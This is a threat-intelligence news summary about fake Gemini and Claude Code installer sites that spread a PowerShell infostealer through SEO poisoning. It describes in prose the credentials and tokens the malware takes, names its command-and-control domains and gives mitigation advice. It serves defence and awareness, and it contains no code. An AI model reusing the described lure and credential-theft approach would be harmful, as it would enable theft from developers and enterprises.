Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning
Cybersecurity

Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning

Infosecurity Magazine
Infosecurity MagazineMay 22, 2026

Companies Mentioned

Google

Google

GOOG

Anthropic

Anthropic

Zoho

Zoho

Proton

Proton

Microsoft

Microsoft

MSFT

Discord

Discord

Slack

Slack

WORK

Zoom Video Communications

Zoom Video Communications

Telegram

Telegram

LiveChat

LiveChat

LVC

Notion

Notion

MEGA

MEGA

Why It Matters

The attack compromises sensitive developer and corporate credentials, exposing enterprises to data theft and further ransomware or espionage threats. It highlights the growing risk of AI‑tool supply‑chain attacks that can bypass traditional security controls.

Key Takeaways

  • Fake Gemini and Claude sites use SEO poisoning to outrank legit pages
  • PowerShell‑run infostealer steals browser and collaboration tool credentials in memory
  • Campaign targets US and UK developers, focusing on enterprise workstations
  • Exfiltrated data sent to C2 domains events.msft23.com and events.ms709.com
  • Attack enables remote code execution, paving way for deeper intrusion

Pulse Analysis

The rapid adoption of AI‑assisted development tools such as Google Gemini’s CLI and Anthropic’s Claude Code has created a lucrative lure for cybercriminals. By registering look‑alike domains and employing SEO‑poisoning techniques, threat actors push malicious pages to the top of search results, tricking developers into downloading counterfeit installers. This campaign, first reported in March 2026, demonstrates how attackers exploit the trust placed in official documentation to gain a foothold on corporate workstations, especially in the United States and United Kingdom where the domains are geographically tailored.

The payload delivered through the fake installers is a memory‑resident infostealer written in PowerShell. Once executed, it harvests credentials from Chromium‑based browsers, Firefox, and a suite of collaboration apps—including Slack, Microsoft Teams, Discord, and Zoom—by extracting local‑state files and DPAPI‑protected keys. It also siphons VPN configurations, cloud‑storage tokens, and cryptocurrency wallet data before encrypting the dump and sending it to command‑and‑control servers at events.msft23.com or events.ms709.com. The ability to run arbitrary remote code gives the adversary a direct path to deeper, hands‑on‑keyboard intrusion.

Enterprises can mitigate this threat by enforcing strict download policies, validating URLs against known vendor domains, and monitoring PowerShell activity for anomalous network connections. Endpoint detection platforms should flag in‑memory PowerShell scripts that attempt to read browser or application state files, while threat‑intel feeds can help block the identified C2 domains. As AI development tools become integral to software pipelines, the security community must treat their distribution channels as critical attack surfaces, ensuring that supply‑chain hygiene keeps pace with the accelerating pace of AI adoption. Regular phishing simulations also reinforce user awareness of fake AI tool pages.

Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning

Read Original Article

Comments

Want to join the conversation?

Loading comments...